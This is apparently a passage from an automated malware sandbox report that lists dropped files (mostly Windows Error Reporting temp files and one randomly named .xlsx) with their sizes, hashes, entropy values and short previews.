                                                                                                                                                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER61CB.tmp.csv

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):93502
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.0893492971314966
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:qji7RyAEej6LUCvtRQrHlqJOtGQVxDFhCcIn/kOW1vlpxTwzynAleRKV:qji7RyAEej6LUCvtRQrHwJOtGQVxDFhI
                                                                                                                                                                                                                                                                                                                                                                MD5:F09F64F4B3E1688792673937117502BA
                                                                                                                                                                                                                                                                                                                                                                SHA1:5FBE99297D773D7C6648CBA5EEF3DAAA82DD059E
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F5B0362DD81E9FBB931A43D81001CE0FD942AFEE001357DAF2AD29A1D7EB5845
                                                                                                                                                                                                                                                                                                                                                                SHA-512:91F210A54B7510AF831A85E00F8C7455A31EAA3AF4CADAF8CD9796F345342A966FA5F77430CCEADF289F17B45BAC61C9BBB9B586353362C6195BD690FEA7113F
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER649B.tmp.txt

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.6850614636883345
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:TiZYWuE7lQYp8Ywf3WZHhUYEZNg2htFiJM8JfYwHB5M3aJimZM5KEIFd3:2ZD0FO2CveaJiuM5KzFd3
                                                                                                                                                                                                                                                                                                                                                                MD5:5408FD5E5E788CE56C6D0AB08D09326B
                                                                                                                                                                                                                                                                                                                                                                SHA1:84CC54ABA4D17F37369D52D52F173F0531504586
                                                                                                                                                                                                                                                                                                                                                                SHA-256:978CDFAEDB86BF5F786B403ADA84FB3D4CAC03034F5A1B6E1878E0FBE2976B32
                                                                                                                                                                                                                                                                                                                                                                SHA-512:FC27F2C3DA1EF2605F1BCCFB33B481E295324B11705F71FE4E4CAF42A74987604C47FE435F88C8431EFF675EE4C2CA0D75182FE5275C33D86179B2849110375A
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DC4.tmp.csv

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):95500
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.0854120355547283
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:yx4It5OepAVUCvtX4Y6eCjx+HClkJxVYryUbc6iMEvVZw64mryIGb97EMvcjSeFk:yx4It5OepAVUCvtX4YdCjx+HClkJxVYX
                                                                                                                                                                                                                                                                                                                                                                MD5:0F2F9978408BDDC2C084B47A968D2DFD
                                                                                                                                                                                                                                                                                                                                                                SHA1:69A0A5CDA55502E122A094863B7BBA2C3052487D
                                                                                                                                                                                                                                                                                                                                                                SHA-256:A5CB2E2A5A78502D71983017A989725F89412471EA658B7A48163A19C76E1420
                                                                                                                                                                                                                                                                                                                                                                SHA-512:83CD35D4B1F829F6798CCECDCBFD2E11A856FE40BF5F54EC4349B770D3E565CFBD81C17EDD20F7FF8CB38F057F536CBC53737B466C877B75C00AAE03D89BDCFE
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FE8.tmp.txt

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.6842711834154067
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:TiZYWr68yYFYIYOWmqHEUYEZJftFizMrJq8wj8w4MagbWM4RnoIp63:2ZDrzfhumXagbWM4RnPp63
                                                                                                                                                                                                                                                                                                                                                                MD5:DF760FB91B0D771BD52B8C36DF2E2295
                                                                                                                                                                                                                                                                                                                                                                SHA1:BDFBD4803ED9AD7CE127BCC7D7D82349C1AA0B15
                                                                                                                                                                                                                                                                                                                                                                SHA-256:9CABDFFAE38619F9DCED37DB2AC383AEF94DCBA1294982EA5DCE1923226657E0
                                                                                                                                                                                                                                                                                                                                                                SHA-512:BC5B96DF883EC3AA4D04E4761613F3665352EF010565F79C469D34FEFB4F71316F295E0F0E8B03D5849691D40C3357A33F3BEE57B3EE363F21A35E4536AF209B
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER72A8.tmp.csv

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):91370
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.0929831219069186
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:vyuD2hFKUCvbT4d6eCjx+HClkJxVYryUbc6iMEvVZw64mryIGb97EtpKp2XGj:vyuD2hFKUCvbT4ddCjx+HClkJxVYryUl
                                                                                                                                                                                                                                                                                                                                                                MD5:C67C1DD572A326E154954E21A3D66728
                                                                                                                                                                                                                                                                                                                                                                SHA1:268806760C7799C13D11687D48166321B205DD6E
                                                                                                                                                                                                                                                                                                                                                                SHA-256:74325A9131C48DA5ECF295B306EE2AE06A9F30C98C4136E7B95482A6D0029C16
                                                                                                                                                                                                                                                                                                                                                                SHA-512:75D2154D76BC3946240657F1F8C02CEE4A92A746843A79390EB02FEF933F5E4EE562EE739D2133BD8E014DF28B70D047125A4EB9D321231F5DC81817F4C9EDF9
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER74BC.tmp.txt

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.6847588175952732
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:TiZYWAEaphbYOYWWzLDHbUYEZ1FUtFi+0M6JK8wSZIQaTCPMdh8I1G3:2ZDoJsLyDbaTCPMdh71G3
                                                                                                                                                                                                                                                                                                                                                                MD5:7AE70555C880EE1BD874ED5909B1C87A
                                                                                                                                                                                                                                                                                                                                                                SHA1:3B53620BB3DAC1A9FAF99EE7FB57BE3FF76ACE92
                                                                                                                                                                                                                                                                                                                                                                SHA-256:4C91573031461F1721802E2AD34BE2AF6BFEA5F928AFDC3FCB8326C97FF22F49
                                                                                                                                                                                                                                                                                                                                                                SHA-512:C704480F41EB853F5C16D1D4D590FBD7B017DA51342EC44F5352C543DCB368FE9B14AF619AE6BE083D7868DB8D505D7DB9A6C3F2E71D9F96CA73B6FA94054B03
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERECEB.tmp.csv

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):90928
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.0937421004984365
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:hPwehGM0rcn26lW8YBvRCjx+HClkJxVYryUbc6iMEvVZw64mryIGb97EOER72T2B:hPwehGM0rcn26lW8YBJCjx+HClkJxVYE
                                                                                                                                                                                                                                                                                                                                                                MD5:93DBF145B135297CBC5FDCA37228C178
                                                                                                                                                                                                                                                                                                                                                                SHA1:185265A38932A826893C63DDF458FFD35A348AFD
                                                                                                                                                                                                                                                                                                                                                                SHA-256:132A6C6BFC928C5772064291AFA7372BD8F99165F67BD89824CCB8ED47FA6327
                                                                                                                                                                                                                                                                                                                                                                SHA-512:650028FED5409B19B5C8DDF09D54DBFE1D6C0F4A05975896F60F0653A1C370A0F8A34D5E78B26E063E05E90FC3D1FCCF37FD623292ABDC80F039D374D3FD87DB
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDF5.tmp.txt

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.686734402011584
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:TiZYWedR3wdcYgtYR1W2HiUYEZIYtFiPMMJkWwQj7a36qMLv7IKj3:2ZDeKcvt+8hHa36qMLv0Kj3
                                                                                                                                                                                                                                                                                                                                                                MD5:05407AB5687E4E5FCDBC08A9AD2F89E6
                                                                                                                                                                                                                                                                                                                                                                SHA1:3F4A8612FABA3FCCA5F8582EF7AA585F8F3A5396
                                                                                                                                                                                                                                                                                                                                                                SHA-256:1061CB8DD10F9732EC875E1D5887B3276A56C5FFDFB3131B32021210960742EE
                                                                                                                                                                                                                                                                                                                                                                SHA-512:0362AA9FF088994E21B6E078D49760C46F9BD6376EA0531270738BE47EC1BE58965CA43F42416643CF0A4C42D551323F675956E4E10A38D6F8FEAC382B34EAF6
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\NEBFQQYWPS.xlsx

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.692704155467908
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
                                                                                                                                                                                                                                                                                                                                                                MD5:D0B81B6D51E4EDDB3769BCE2A5F1538F
                                                                                                                                                                                                                                                                                                                                                                SHA1:08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
                                                                                                                                                                                                                                                                                                                                                                SHA-256:18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
                                                                                                                                                                                                                                                                                                                                                                SHA-512:CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
